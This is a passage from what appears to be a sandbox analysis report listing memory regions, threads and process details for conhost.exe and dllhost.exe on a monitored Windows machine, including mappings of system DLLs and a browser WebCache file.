0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2261 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2262 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2263 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2264 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2265 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2266 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2267 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2268 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2269 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2270 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2271 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2272 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2273 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2274 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2275 start_va = 0x600000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2276 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2277 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2278 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2279 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2280 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2281 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2282 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2283 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2284 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2285 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2286 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2287 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2288 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2289 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2290 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2291 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2292 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 2293 start_va = 0x9c0000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 2294 start_va = 0xb50000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2295 start_va = 0x1f50000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 2296 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2297 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2298 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2299 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2300 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2301 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2302 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2303 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2304 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2305 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2306 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2307 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2308 start_va = 0x640000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2309 start_va = 0x2110000 end_va = 0x2446fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2310 start_va = 0x2450000 end_va = 0x2663fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 2311 start_va = 0x2670000 end_va = 0x2885fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2312 start_va = 0x1f50000 end_va = 0x205efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 2313 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2314 start_va = 0x2890000 end_va = 0x2aa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 2315 start_va = 0x2ab0000 end_va = 0x2bc5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 2316 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2317 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2318 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2319 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2320 start_va = 0x2bd0000 end_va = 0x2c8bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 2321 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2322 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2323 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2324 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2325 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2326 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2327 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2328 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2329 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2330 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2331 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2332 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2333 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2334 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2335 start_va = 0x6d0000 end_va = 0x6d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Thread: id = 309 os_tid = 0x1340 Thread: id = 310 os_tid = 0xbc8 Thread: id = 311 os_tid = 0x648 Thread: id = 312 os_tid = 0x650 Process: id = "82" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0xb042000" os_pid = "0x884" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x278" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2523 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2524 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2525 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2526 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2527 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2528 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2529 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2530 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2531 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2532 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2533 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2534 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2535 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2536 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2537 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2538 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2539 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2540 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2541 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2542 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2543 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 2544 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2545 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2546 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2547 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2548 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2549 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2550 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2551 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2552 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2553 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2554 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2555 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2556 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2557 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2558 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2559 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2560 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2561 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2562 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2563 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2564 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2565 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2566 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2567 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2568 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2569 start_va = 0x870000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2570 start_va = 0x880000 end_va = 0x881fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 2571 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2572 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2573 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2574 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 2575 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2576 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2577 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: 